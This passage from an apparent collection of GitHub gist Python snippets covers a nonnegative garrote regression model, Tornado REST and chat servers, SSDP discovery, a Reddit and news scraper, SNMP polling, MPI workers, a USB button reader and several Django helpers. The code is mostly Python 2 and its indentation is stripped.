# Residual Sum of Squares
rss_path = np.sum((y[:, None] - np.dot(X, coef_path)) ** 2, axis=0)
return coef_path, shrink_coef_path, rss_path
class NonNegativeGarrote(LinearModel):
"""NonNegativeGarrote
Ref:
<NAME>. (1995), "Better Subset Regression Using the Nonnegative
Garrote," Technometrics, 37, 373-384. [349,351]
"""
def __init__(self, alpha, fit_intercept=True, tol=1e-4, normalize=False,
copy_X=True):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.tol = tol
self.normalize = normalize
self.copy_X = copy_X
def fit(self, X, y):
X, y, X_mean, y_mean, X_std = self._center_data(X, y,
self.fit_intercept, self.normalize, self.copy_X)
self.coef_, self.shrink_coef_, self.rss_ = \
non_negative_garotte(X, y, self.alpha)
self._set_intercept(X_mean, y_mean, X_std)
if __name__ == '__main__':
import pylab as pl
from sklearn.utils import check_random_state
from sklearn.linear_model import lars_path
rng = check_random_state(None)
max_samples = 501
sample_size_range = xrange(25, max_samples, 25)
# true path
coef = np.array([1, 1, 0])
# for 4 different values of alpha
for alpha_val, fig_num in ((0.35, 1), (0.45, 2), (0.55, 3), (0.65, 4)):
# lists for plotting the two techniques results
hits_lars = []
hits_ng = []
print 'for alpha = ', alpha_val
# set up plots
pl.figure(fig_num, figsize=(5, 5))
pl.clf
pl.axis('tight')
pl.title('alpha = %.2f' % alpha_val )
pl.xlabel('Sample Size')
pl.ylabel('Frequency of Selecting Correct Models')
# vary the sample size from 25 up until 500
for sample_size in sample_size_range:
ng_path_correct = 0
lars_path_correct = 0
# create 100 data sets to test
for dataset_iter in xrange(100):
# create a dataset
X1 = rng.randn(sample_size)
X2 = rng.randn(sample_size)
X3 = np.sqrt(1 - 2 * alpha_val ** 2) * rng.randn(sample_size) \
+ alpha_val * (X1 + X2)
X = np.c_[X1, X2, X3]
y = np.dot(X, [1, 1, 0])
# get the lasso's coefficients
alphas, _, coefs = lars_path(X, y, method='lasso')
# get the non-negative garotte's coefficients
ng_coefs, _, _ = non_negative_garotte_path(X, y, eps=1e-5)
# test if either model's solution path matches the orinial model
if np.any(np.all(ng_coefs.astype(np.bool) == coef.astype(np.bool)[:, np.newaxis], axis=0)):
ng_path_correct += 1
if np.any(np.all(coefs.astype(np.bool) == coef.astype(np.bool)[:, np.newaxis], axis=0)):
lars_path_correct += 1
hits_lars.append(lars_path_correct / 100.)
hits_ng.append(ng_path_correct / 100.)
pl.plot(sample_size_range, hits_lars, 'r-')
pl.plot(sample_size_range, hits_ng, 'b-')
pl.xlim([0, max_samples])
pl.ylim([0, 1.1])
pl.show()
```
#### File: hard-gists/2416148/snippet.py
```python
import json
import tornado.web
import tornado.httpserver
import pymongo
from pymongo.objectid import ObjectId
class BackboneHandler(tornado.web.RequestHandler):
def initialize(self, auth=True):
self.auth = auth
def prepare(self):
""" authenticate user if required """
if self.auth:
if not self.current_user:
raise tornado.web.HTTPError(403)
def encode(self, data):
return json.dumps(data)
def decode(self, data):
return self.loads(data)
# HTTP Verbs / Backbone.js API
def get(self, *args):
""" return the collection or a model """
if self.is_get_collection(*args):
self.write(self.encode(self.get_collection(*args)))
else:
model = self.get_model(*args)
if model:
self.write(self.encode(model))
else:
raise tornado.web.HTTPError(404)
def post(self, *args):
""" create a model """
resp = self.create_model(self.decode(self.request.body), *args)
self.write(json.dumps(resp))
def put(self, *args):
""" update a model """
resp = self.update_model(self.decode(self.request.body), *args)
self.write(json.dumps(resp))
def delete(self, *args):
""" delete a model """
self.delete_model(*args)
# Extension points
def is_get_collection(self, *args):
""" return true if this get is for a collection """
return len(args) == 0
def create_model(self, model, *args):
""" create model and return a dictionary of updated attributes """
raise tornado.web.HTTPError(404)
def get_collection(self, *args):
""" return the collection """
raise tornado.web.HTTPError(404)
def get_model(self, *args):
""" return a model, return None to indicate not found """
raise tornado.web.HTTPError(404)
def update_model(self, model, *args):
""" update a model """
raise tornado.web.HTTPError(404)
def delete_model(self, *args):
""" delete a model """
raise tornado.web.HTTPError(404)
class MongoBackboneHandler(BackboneHandler):
def initialize(self, database=None, **kws):
BackboneHandler.initialize(self, **kws)
self.database = database
# BackboneHandler extension
def encode(self, data):
if not isinstance(data, pymongo.cursor.Cursor):
if '_id' in data:
data['_id'] = str(data['_id'])
return json.dumps(data)
else: # we have a cursor
data = list(data)
for d in data:
if '_id' in d:
d['_id'] = str(d['_id'])
return json.dumps(data)
def decode(self, data):
data = json.loads(data)
if '_id' in data:
data['_id'] = ObjectId(data['_id'])
return data
def create_model(self, model):
if not self.validate(model):
raise tornado.web.HTTPError(400)
updates = self.before_create(model)
model.update(updates)
mid = str(self.database.insert(model))
updates['_id'] = mid
return updates
def get_collection(self, *args):
return self.database.find(self.collection_query(*args))
def get_model(self, *args):
return self.database.find_one(self.model_query(*args))
def update_model(self, model, *args):
updates = self.before_update(model)
model.update(updates)
self.database.update(self.model_query(*args), model)
return updates
def delete_model(self, *args):
self.database.remove(self.model_query(*args))
# Extension points
def collection_query(self, *args):
""" return the query to find a collection from a list of url args """
return None
def model_query(self, *args):
""" return the query to find a model """
return {'_id': ObjectId(args[-1])}
def validate(self, model):
""" return False to to disallow this model """
return True
def before_create(self, model):
""" return any extra attributes you want to add to the model """
return {}
def before_update(self, model):
return {}
if __name__ == "__main__":
import sys
if len(sys.argv) > 1 and sys.argv[1] == 'backbone':
class TestHandler(BackboneHandler):
def get_current_user(self):
""" we want to check auth/noauth """
return 'test'
models = [dict(id=str(i), text='X' * i) for i in range(10)]
def _find(self, cid):
ms = [x for x in self.models if x['id'] == cid]
return ms[0] if ms else None
def create_model(self, model):
model['id'] = str(max([int(x['id']) for x in self.models]) + 1)
self.models.append(model)
print 'created', model
return dict(id = model['id'])
def get_collection(self):
return self.models
def get_model(self, cid):
return self._find(cid)
def update_model(self, model, cid):
print 'updating', cid, model
self.models[self.models.index(self._find(cid))] = model
def delete_model(self, cid):
print 'deleting'
self.models.remove(self._find(cid))
application = tornado.web.Application([
(r"/api", TestHandler),
(r"/api/(.+)", TestHandler),
],
debug=True,
static_path='static',
)
application.listen(9999)
tornado.ioloop.IOLoop.instance().start()
else:
import tornado.testing
import unittest
import urllib
class Handler(MongoBackboneHandler):
def before_create(self, model):
return dict(created=10)
class TestMongo(tornado.testing.AsyncHTTPTestCase):
def setUp(self):
self.conn = pymongo.Connection()
self.db = self.conn['bh_test']
self.coll = self.db['bh_test']
self.doc = self.coll.insert(dict(a=1, b=2))
tornado.testing.AsyncHTTPTestCase.setUp(self)
def tearDown(self):
tornado.testing.AsyncHTTPTestCase.tearDown(self)
self.conn.drop_database('bh_test')
def get_app(self):
return tornado.web.Application([
(r"/api/", Handler, dict(database=self.coll, auth=False)),
(r"/api/(.+)", Handler, dict(database=self.coll,
auth=False)),
],
debug=True,
static_path='static',
)
def test_get_model(self):
response = self.fetch('/api/' + str(self.doc), method='GET')
self.assertEqual(response.code, 200)
model = json.loads(response.body)
self.assertEqual(model['_id'], str(self.doc))
self.assertEqual(model['a'], 1)
def test_get_collection(self):
response = self.fetch('/api/', method='GET')
self.assertEqual(response.code, 200)
models = json.loads(response.body)
self.assertEqual(len(models), 1)
self.assertEqual(models[0]['a'], 1)
def test_create_model(self):
post_args = {'email': '<EMAIL>'}
response = self.fetch('/api/', method='POST',
body=json.dumps(post_args))
resp = json.loads(response.body)
self.assertTrue('_id' in resp)
self.assertEqual(resp['created'], 10)
def test_update_model(self):
response = self.fetch('/api/' + str(self.doc), method='GET')
self.assertEqual(response.code, 200)
model = json.loads(response.body)
model['foo'] = '1234'
response = self.fetch('/api/' + str(self.doc), method='PUT',
body=json.dumps(model))
self.assertEqual(response.code, 200)
doc = self.coll.find_one(self.doc)
self.assertEqual(doc['foo'], '1234')
def test_delete_model(self):
response = self.fetch('/api/' + str(self.doc), method='DELETE')
self.assertEqual(response.code, 200)
doc = self.coll.find_one(self.doc)
self.assertEqual(doc, None)
unittest.main()
```
#### File: hard-gists/2428250/snippet.py
```python
import socket
import struct
import sys
from httplib import HTTPResponse
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
import gtk
import gobject
LIB_ID = 'my_library'
MCAST_GRP = '172.16.58.3'
MCAST_PORT = 1900
SERVICE_LOCS = {'id1': '127.0.0.1:7766', 'id2': '127.0.0.1:7766'}
DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
'ST: %(library)s:%(service)s\r\n' +
'MX: 3\r\n' +
'MAN: "ssdp:discover"\r\n' +
'HOST: 172.16.58.3:1900\r\n\r\n')
LOCATION_MSG = ('HTTP/1.1 200 OK\r\n' +
'ST: %(library)s:%(service)s\r\n'
'USN: %(service)s\r\n'
'Location: %(loc)s\r\n'
'Cache-Control: max-age=900\r\n\r\n')
class Request(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message):
self.error_code = code
self.error_message = message
class Response(HTTPResponse):
def __init__(self, response_text):
self.fp = StringIO(response_text)
self.debuglevel = 0
self.strict = 0
self.msg = None
self._method = None
self.begin()
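# Yield one address per local interface for the given address family.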
def interface_addresses(family=socket.AF_INET):
for fam, _, _, _, sockaddr in socket.getaddrinfo('', None):
if family == fam:
yield sockaddr[0]
def client(timeout=1, retries=5):
socket.setdefaulttimeout(timeout)
for _ in xrange(retries):
for addr in interface_addresses():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind((addr, 0))
msg = DISCOVERY_MSG % dict(service='id1', library=LIB_ID)
for _ in xrange(2):
# sending it more than once will
# decrease the probability of a timeout
sock.sendto(msg, (MCAST_GRP, MCAST_PORT))
try:
data = sock.recv(1024)
except socket.timeout:
pass
else:
response = Response(data)
print response.getheader('Location')
return
def server(timeout=5):
socket.setdefaulttimeout(timeout)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(('', MCAST_PORT))
mreq = struct.pack('4sl', socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
cond = gobject.IO_IN | gobject.IO_HUP
gobject.io_add_watch(sock, cond, handle_requests)
gtk.main()
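# Answer SSDP M-SEARCH requests for services this process advertises.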
def handle_requests(sock, _):
data, addr = sock.recvfrom(4096)
request = Request(data)
if not request.error_code and \
request.command == 'M-SEARCH' and \
request.path == '*' and \
request.headers['ST'].startswith(LIB_ID) and \
request.headers['MAN'] == '"ssdp:discover"':
service = request.headers['ST'].split(':', 2)[1]
if service in SERVICE_LOCS:
loc = SERVICE_LOCS[service]
msg = LOCATION_MSG % dict(service=service, loc=loc, library=LIB_ID)
sock.sendto(msg, addr)
return True
if __name__ == '__main__':
if len(sys.argv) > 1 and 'client' in sys.argv[1]:
client()
else:
server()
```
#### File: hard-gists/2511464/snippet.py
```python
import logging
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.netutil import TCPServer
class ChatConnection(object):
def __init__(self, stream, address, connections):
logging.info('receive a new connection from %s', address)
self.state = 'AUTH'
self.name = None
self.connections = connections;
self.stream = stream
self.address = address
self.stream.set_close_callback(self._on_close)
self.stream.read_until('\n', self._on_read_line)
stream.write('Enter your name: ', self._on_write_complete)
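# The first line received is the user's name; subsequent lines are chat messages broadcast to everyone else.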
def _on_read_line(self, data):
logging.info('read a new line from %s', self.address)
if self.state == 'AUTH':
name = data.rstrip();
if self.connections.has_key(name):
self.stream.write('Name taken, choose another: ', self._on_write_complete)
return
# message = 'Welcome, %s!\n' % (name)
self.stream.write('Welcome, %s!\n' % (name), self._on_write_complete)
self.connections[name] = self
self.name = name
self.state = 'CHAT'
message = '%s has arrived\n' % (self.name)
for _,conn in self.connections.iteritems():
if conn != self:
conn.stream.write(message, self._on_write_complete)
else:
message = '<%s> %s\n' % (self.name, data.rstrip())
for _,conn in self.connections.iteritems():
if conn != self:
conn.stream.write(message, self._on_write_complete)
def _on_write_complete(self):
logging.info('wrote a line to %s', self.address)
if not self.stream.reading():
self.stream.read_until('\n', self._on_read_line)
def _on_close(self):
logging.info('client quit %s', self.address)
if self.name != None:
del self.connections[self.name]
message = '%s has left\n' % (self.name)
for _,conn in self.connections.iteritems():
conn.stream.write(message, self._on_write_complete)
class ChatServer(TCPServer):
def __init__(self, io_loop=None, ssl_options=None, **kwargs):
logging.info('a echo tcp server is started')
TCPServer.__init__(self, io_loop=io_loop, ssl_options=ssl_options, **kwargs)
def handle_stream(self, stream, address):
ChatConnection(stream, address, chat_connections)
def main(connections):
chat_server = ChatServer()
chat_server.listen(8888)
IOLoop.instance().start()
chat_connections = {}
if __name__ == '__main__':
main(chat_connections)
```
#### File: hard-gists/256155/snippet.py
```python
import base64
from django.utils import simplejson
import urllib
from google.appengine.api import urlfetch
def track(event, properties=None):
"""
A simple function for asynchronously logging to the mixpanel.com API on App Engine
(Python) using RPC URL Fetch object.
@param event: The overall event/category you would like to log this data under
@param properties: A dictionary of key-value pairs that describe the event
See http://mixpanel.com/api/ for further detail.
@return Instance of RPC Object
"""
if properties == None:
properties = {}
token = "YOUR_TOKEN"
if "token" not in properties:
properties["token"] = token
params = {"event": event, "properties": properties}
data = base64.b64encode(simplejson.dumps(params))
request = "http://api.mixpanel.com/track/?data=" + data
rpc = urlfetch.create_rpc()
urlfetch.make_fetch_call(rpc, request)
return rpc
def track_funnel(funnel, step, goal, properties=None):
if properties == None:
properties = {}
properties["funnel"] = funnel
properties["step"] = step
properties["goal"] = goal
track("mp_funnel", properties)
```
#### File: hard-gists/2577781/snippet.py
```python
from queue import Queue
from threading import Thread
from functools import partial
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado import gen
from tornado.ioloop import IOLoop
import himitsu
def make_hash(text):
b = himitsu.Bcrypt()
return b.encode(text)
class WorkerThread(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
self.daemon = True
self.start()
def run(self):
while True:
func, args, kwargs, callback = self.queue.get()
try:
result = func(*args, **kwargs)
if callback is not None:
IOLoop.instance().add_callback(partial(callback, result))
except Exception as e:
print(e)
self.queue.task_done()
class ThreadPool(object):
def __init__(self, num_threads):
self.queue = Queue()
for _ in range(num_threads):
WorkerThread(self.queue)
def add_task(self, func, args=(), kwargs={}, callback=None):
self.queue.put((func, args, kwargs, callback))
def wait_completion(self):
self.queue.join()
class BaseHandler(tornado.web.RequestHandler):
@property
def pool(self):
if not hasattr(self.application, 'pool'):
self.application.pool = ThreadPool(20)
return self.application.pool
class IndexHandler(BaseHandler):
@tornado.web.asynchronous
@gen.engine
def get(self):
result = yield gen.Task(
self.pool.add_task, make_hash, ('Test',)
)
self.write(result)
self.finish()
def main():
try:
tornado.options.parse_command_line()
application = tornado.web.Application([
(r'/', IndexHandler)
], debug=True)
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print('Exit')
if __name__ == '__main__':
main()
```
#### File: hard-gists/25d48938c07b73541361/snippet.py
```python
import gspread
from newspaper import Article
from bs4 import BeautifulSoup
import requests
import re
import time
import feedparser
# Login with your Google account
gc = gspread.login('megmailaccount', 'mepassword')
# Open a worksheet from spreadsheet with one shot
wks = gc.open("Morning App feed").sheet1
data = wks.get_all_values()
scraped_urls = [i[3] for i in data[1:]]
def format(text):
#remove content inside round brackets
text = re.sub(r'\[(?:[^\]|]*\|)?([^\]|]*)\]', '', text)
#remove content inside round brackets
text = re.sub(r'\([^)]*\)', '', text)
text = text.strip()
return text
def addToSpreadsheet(title,url):
article= Article(url)
article.download()
article.parse()
image = article.top_image
wks.insert_row([time.strftime("%d/%m/%Y"),"some category",title,url,image],index=2)
def scrapeRedditArticles(limit=6,url="http://www.reddit.com/r/GetMotivated/search.json?q=flair%3Aarticle&sort=top&restrict_sr=on&t=week"):
reddit_url = url
headers = {'User-Agent' : 'this is a simple reddit bot by /u/tomarina'}
reddit_json = requests.get(reddit_url,headers=headers).json()
for i in reddit_json["data"]["children"][:6]:
if i['data']['is_self'] == True: continue
if i['data']['over_18'] == True: continue
if i["data"]["url"] in scraped_urls: continue
title = format(i["data"]["title"])
url = i["data"]["url"]
print title,url
addToSpreadsheet(title,url)
def scrapeQuotes(limit=3):
scrapeRedditArticles(limit,url="http://www.reddit.com/r/GetMotivated/search.json?q=flair%3Aimage&sort=top&restrict_sr=on&t=week")
def scrapeLifehacker(limit=4):
url = "http://lifehacker.com/tag/motivation"
data = requests.get(url).text
soup = BeautifulSoup(data)
for item in soup.select("div.post-list > div.post-wrapper")[:limit]:
title = item.select("h1.headline")[0].get_text()
url = item.select("h1.headline > a")[0].get("href")
if url in scraped_urls:continue
print title,url
addToSpreadsheet(title,url)
def scrapeHuffPost(limit=4):
url = "http://www.huffingtonpost.com/feeds/verticals/good-news/index.xml"
d = feedparser.parse(url)
for item in d["entries"][:limit]:
title = item['title']
url = item['link']
        print title,url
addToSpreadsheet(title,url)
def scrapeEntrepreneur(limit=4):
url = "http://www.entrepreneur.com/topic/motivation"
data = requests.get(url).text
soup = BeautifulSoup(data)
for item in soup.select("div.adrt-content > div.row > div.col-md-12 > div.pl")[:limit]:
title = item.select("h3 > a")[0].get_text()
url = item.select("h3 > a")[0].get('href')
url = "http://www.entrepreneur.com"+url
print title,url
addToSpreadsheet(title,url)
def dailyCron():
scrapeRedditArticles(2)
scrapeEntrepreneur(2)
scrapeQuotes(1)
scrapeLifehacker(2)
scrapeHuffPost(2)
scrapeEntrepreneur(2)
scrapeQuotes(1)
if __name__ == '__main__':
dailyCron()
```
#### File: hard-gists/261818/snippet.py
```python
import getpass
import os
import sys
## Application specific
SDK_DIR = '/usr/local/google_appengine'
APP_DIR = '/home/username/src/app'
APPID = 'something-awesome'
EMAIL = '<EMAIL>'
REMOTE_API_PATH = '/remote_api'
## Extra paths to be inserted into sys.path,
## including the SDK, it's libraries, your APPDIR, and APPDIR/lib
EXTRA_PATHS = [
SDK_DIR,
os.path.join(SDK_DIR, 'lib', 'antlr3'),
os.path.join(SDK_DIR, 'lib', 'django'),
os.path.join(SDK_DIR, 'lib', 'webob'),
os.path.join(SDK_DIR, 'lib', 'yaml', 'lib'),
APP_DIR,
os.path.join(APP_DIR, 'lib'),
]
sys.path = EXTRA_PATHS + sys.path
from google.appengine.ext.remote_api import remote_api_stub
def attach(host=None):
def auth_func():
if host and host.startswith('localhost'):
return ('foo', 'bar')
else:
return (EMAIL, getpass.getpass())
remote_api_stub.ConfigureRemoteApi(APPID, REMOTE_API_PATH, auth_func, host)
remote_api_stub.MaybeInvokeAuthentication()
os.environ['SERVER_SOFTWARE'] = 'Development (remote_api)/1.0'
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == '-l':
host = 'localhost:8080'
else:
host = None
attach(host)
from google.appengine.ext import db
from google.appengine.api import memcache
BANNER = "App Engine remote_api shell\n" + \
"Python %s\n" % sys.version + \
"The db, and memcache modules are imported."
## Use readline for completion/history if available
try:
import readline
except ImportError:
pass
else:
HISTORY_PATH = os.path.expanduser('~/.remote_api_shell_history')
readline.parse_and_bind('tab: complete')
if os.path.exists(HISTORY_PATH):
readline.read_history_file(HISTORY_PATH)
import atexit
atexit.register(lambda: readline.write_history_file(HISTORY_PATH))
sys.ps1 = '%s <-- ' % (host or APPID)
import code
code.interact(banner=BANNER, local=globals())
```
#### File: hard-gists/263113/snippet.py
```python
import django
from django.utils.translation import ugettext_lazy as _
from debug_toolbar.panels import DebugPanel
from haystack.backends import queries
class HaystackDebugPanel(DebugPanel):
"""
Panel that displays the Haystack queries.
"""
name = 'Haystack'
has_content = True
def nav_title(self):
return _('Haystack queries')
def nav_subtitle(self):
return "%s queries" % len(queries)
def url(self):
return ''
def title(self):
return 'Haystack Queries'
def content(self):
return "".join(["<p>%s<br><br></p>" % q for q in queries])
```
#### File: hard-gists/2691939/snippet.py
```python
import sys
import time
import sched
import snmpclient
import pysnmp.entity.rfc3413.oneliner.cmdgen as cmdgen
client = snmpclient.SnmpClient('192.168.1.10', [{}])
generator = cmdgen.CommandGenerator()
target = cmdgen.UdpTransportTarget((client.host, client.port))
oids = ['IF-MIB::ifHCInOctets.10001', 'IF-MIB::ifHCOutOctets.10002', 'IF-MIB::ifHCOutOctets.10003']
noids = map(snmpclient.nodeid, oids)
s = sched.scheduler(time.time, time.sleep)
with file(sys.argv[1], 'a') as f:
f.write('# start\n')
def poll(sc):
s.enter(1, 1, poll, (s,))
val = [time.time()]
for noid in noids:
error, _, _, binds = generator.getCmd(client.auth, target, noid)
if error:
raise Exception('FAIL')
val.append(int(binds[0][1]))
val = ','.join(map(str, val))
f.write(val)
f.write('\n')
f.flush()
print val
s.enter(1, 1, poll, (s,))
s.run()
```
#### File: hard-gists/2768310/snippet.py
```python
from django.db import models
from djangotoolbox.fields import BlobField
class ProtobufField(BlobField):
description = "Storage for protobuffer objects"
__metaclass__ = models.SubfieldBase
def __init__(self, protoclass, *args, **kwargs):
self.protoclass = protoclass
super(ProtobufField, self).__init__(*args, **kwargs)
def to_python(self, value):
if isinstance(value, self.protoclass):
return value
protobuf = self.protoclass()
protobuf.ParseFromString(value)
return protobuf
def get_prep_value(self, value):
return value.SerializeToString()
def get_db_prep_value(self, value, connection, prepared=False):
if hasattr(value, "SerializeToString"):
value = value.SerializeToString()
return super(ProtobufField, self).get_db_prep_value(value=value, connection=connection, prepared=prepared)
def value_to_string(self, obj):
obj = obj.SerializeToString()
return super(ProtobufField, self).value_to_string(obj)
```
#### File: hard-gists/2773137/snippet.py
```python
import ROOT
from mpi4py import MPI
import sys
import cPickle as pick
WORKTAG = 0
DIETAG = 1
class Work():
def __init__(self, work_items):
self.work_items = work_items[:]
def get_next_item(self):
if len(self.work_items) == 0:
return None
return self.work_items.pop()
def master(wi):
all_data = []
size = MPI.COMM_WORLD.Get_size()
current_work = Work(wi)
comm = MPI.COMM_WORLD
status = MPI.Status()
for i in range(1, size):
anext = current_work.get_next_item()
if not anext: break
comm.send(obj=anext, dest=i, tag=WORKTAG)
while 1:
anext = current_work.get_next_item()
if not anext: break
data = comm.recv(obj=None, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)
all_data.append(data)
comm.send(obj=anext, dest=status.Get_source(), tag=WORKTAG)
for i in range(1,size):
data = comm.recv(obj=None, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG)
all_data.append(data)
for i in range(1,size):
comm.send(obj=None, dest=i, tag=DIETAG)
return all_data
def slave(do_work):
comm = MPI.COMM_WORLD
status = MPI.Status()
while 1:
data = comm.recv(obj=None, source=0, tag=MPI.ANY_TAG, status=status)
if status.Get_tag(): break
comm.send(obj=do_work(data), dest=0)
def main(work_list, do_work):
rank = MPI.COMM_WORLD.Get_rank()
name = MPI.Get_processor_name()
size = MPI.COMM_WORLD.Get_size()
if rank == 0:
all_dat = master(work_list)
else:
slave(do_work)
```
#### File: hard-gists/2778605/snippet.py
```python
import sys
import time
import usb
class Button:
def __init__(self, vendor_id, device_id):
"""
Find and open a USB HID device.
"""
self.vendor_id = vendor_id
self.device_id = device_id
self.endpoint = 0x81
self.device = self.getDevice(vendor_id, device_id)
if self.device == None:
raise DeviceNotFound, "No recognised device connected."
self.handle = self.openDevice(self.device)
def __del__(self):
"""
Releases the device.
"""
try:
self.handle.releaseInterface()
del self.handle
except:
pass
def getDevice(self, vendor_id, device_id):
"""
Searches the USB buses for a device matching the given vendor and device IDs.
Returns a usb.Device, or None if the device cannot be found.
"""
busses = usb.busses()
for bus in busses:
devices = bus.devices
for device in devices:
if device.idVendor == vendor_id and device.idProduct == device_id:
return device
return None
def openDevice(self, device):
"""
Opens and claims the specified device. Returns a usb.DeviceHandle
Also attempts to detach the kernel's driver from the device, if necessary.
"""
handle = device.open()
# Attempt to remove other drivers using this device. This is necessary
# for HID devices.
try:
handle.detachKernelDriver(0)
except:
pass # Ignore failures here, the device might already be detached.
handle.claimInterface(0)
return handle
def on_keydown(self):
print "keydown event"
def on_keyup(self):
print "keyup event"
def start(self):
data = None
while True:
try:
data = self.handle.interruptRead(self.endpoint, 8, 0)
except:
raise
if data == (0, 0, 88, 0, 0, 0, 0, 0): # numeric keypad enter pressed
self.on_keydown()
elif data == (0, 0, 0, 0, 0, 0, 0, 0):
self.on_keyup()
data = None
class DeviceNotFound(Exception):
def __init__(self,value):
self.value = value
def __str__(self):
return repr(self.value)
if __name__ == "__main__":
button = Button(0x1710, 0x5612)
button.start()
```
#### File: hard-gists/2798682/snippet.py
```python
import multiprocessing
from multiprocessing.managers import SyncManager
import Queue
import time
from factorize import factorize_naive
from eblib.utils import Timer
IP = '192.168.1.102'
PORTNUM = 55444
AUTHKEY = 'shufflin'
def make_server_manager(port, authkey):
job_q = Queue.Queue()
result_q = Queue.Queue()
class JobQueueManager(SyncManager):
pass
JobQueueManager.register('get_job_q', callable=lambda: job_q)
JobQueueManager.register('get_result_q', callable=lambda: result_q)
manager = JobQueueManager(address=('', port), authkey=authkey)
manager.start()
print 'Server started at port %s' % port
return manager
def make_client_manager(ip, port, authkey):
class ServerQueueManager(SyncManager):
pass
ServerQueueManager.register('get_job_q')
ServerQueueManager.register('get_result_q')
manager = ServerQueueManager(address=(ip, port), authkey=authkey)
manager.connect()
print 'Client connected to %s:%s' % (ip, port)
return manager
def factorizer_worker(job_q, result_q):
myname = multiprocessing.current_process().name
while True:
try:
job = job_q.get_nowait()
#print '%s got %s nums...' % (myname, len(job))
outdict = {n: factorize_naive(n) for n in job}
result_q.put(outdict)
#print ' %s done' % myname
except Queue.Empty:
return
def mp_factorizer(shared_job_q, shared_result_q, nprocs):
procs = []
for i in range(nprocs):
p = multiprocessing.Process(
target=factorizer_worker,
args=(shared_job_q, shared_result_q))
procs.append(p)
p.start()
for p in procs:
p.join()
def make_nums(N):
nums = [999999999999]
for i in xrange(N):
nums.append(nums[-1] + 2)
return nums
def runserver():
manager = make_server_manager(PORTNUM, AUTHKEY)
shared_job_q = manager.get_job_q()
shared_result_q = manager.get_result_q()
N = 999
nums = make_nums(N)
chunksize = 43
for i in range(0, len(nums), chunksize):
#print 'putting chunk %s:%s in job Q' % (i, i + chunksize)
shared_job_q.put(nums[i:i + chunksize])
with Timer('howlong...'):
mp_factorizer(shared_job_q, shared_result_q, 8)
numresults = 0
resultdict = {}
while numresults < N:
outdict = shared_result_q.get()
resultdict.update(outdict)
numresults += len(outdict)
for num, factors in resultdict.iteritems():
product = reduce(lambda a, b: a * b, factors, 1)
if num != product:
assert False, "Verification failed for number %s" % num
print '--- DONE ---'
time.sleep(2)
manager.shutdown()
def runclient():
manager = make_client_manager(IP, PORTNUM, AUTHKEY)
job_q = manager.get_job_q()
result_q = manager.get_result_q()
mp_factorizer(job_q, result_q, 4)
if __name__ == '__main__':
import sys
if len(sys.argv) > 1 and sys.argv[1] == 'client':
runclient()
else:
runserver()
```
#### File: hard-gists/2830057/snippet.py
```python
import urlparse
import re
from django.db import models
from django import forms
from django.utils.translation import ugettext_lazy as _
def validate_youtube_url(value):
'''El patron lo saque de http://stackoverflow.com/questions/2964678/jquery-youtube-url-validation-with-regex'''
pattern = r'^http:\/\/(?:www\.)?youtube.com\/watch\?(?=.*v=\w+)(?:\S+)?$'
if value[:16] == 'http://youtu.be/':
if re.match(r'\w+', value[16:]) is None:
raise forms.ValidationError(_('Not a valid Youtube URL'))
elif re.match(pattern, value) is None:
raise forms.ValidationError(_('Not a valid Youtube URL'))
class YoutubeUrl(unicode):
@property
def video_id(self):
parsed_url = urlparse.urlparse(self)
if parsed_url.query == '':
return parsed_url.path
return urlparse.parse_qs(parsed_url.query)['v'][0]
@property
def embed_url(self):
return 'http://youtube.com/embed/%s/' % self.video_id
@property
def thumb(self):
return "http://img.youtube.com/vi/%s/2.jpg" % self.video_id
class YoutubeUrlField(models.URLField):
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
super(YoutubeUrlField, self).__init__(*args, **kwargs)
self.validators.append(validate_youtube_url)
def to_python(self, value):
url = super(YoutubeUrlField, self).to_python(value)
return YoutubeUrl(url)
def get_prep_value(self, value):
return unicode(value)
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules([], ["^fields\.YoutubeUrlField"])
except ImportError:
pass
```
#### File: hard-gists/2838927/snippet.py
```python
import tw2.core as twc
import tw2.forms as twf
import tw2.sqla as twsa
import tw2.bootstrap as twb
from awesome.model import Group, User
class DbSelectionField(twf.SelectionField):
entity = twc.Param('SQLAlchemy mapped class to use', request_local=False)
query = twc.Param()
def prepare(self):
self.options = [(x.id, unicode(x)) for x in self.query.all()]
super(DbSelectionField, self).prepare()
class GroupSelectField(twb.SingleSelectField, DbSelectionField):
@classmethod
def post_define(cls):
if getattr(cls, 'entity', None):
cls.validator = twsa.RelatedValidator(entity=cls.entity)
class UserForm(twb.HorizontalForm):
id = twf.HiddenField()
group_id = GroupSelectField(
entity=Group,
)
def prepare(self):
self.child.c.group_id.query = \
Group.query.filter(
Group.id.in_(User.query.get(self.value.id).groups)
)
super(UserForm, self).prepare()
```
#### File: hard-gists/2866253/snippet.py
```python
from random import choice
from string import ascii_lowercase, digits
from django.contrib.auth.models import User
def generate_random_username(length=16, chars=ascii_lowercase+digits, split=4, delimiter='-'):
username = ''.join([choice(chars) for i in xrange(length)])
if split:
username = delimiter.join([username[start:start+split] for start in range(0, len(username), split)])
try:
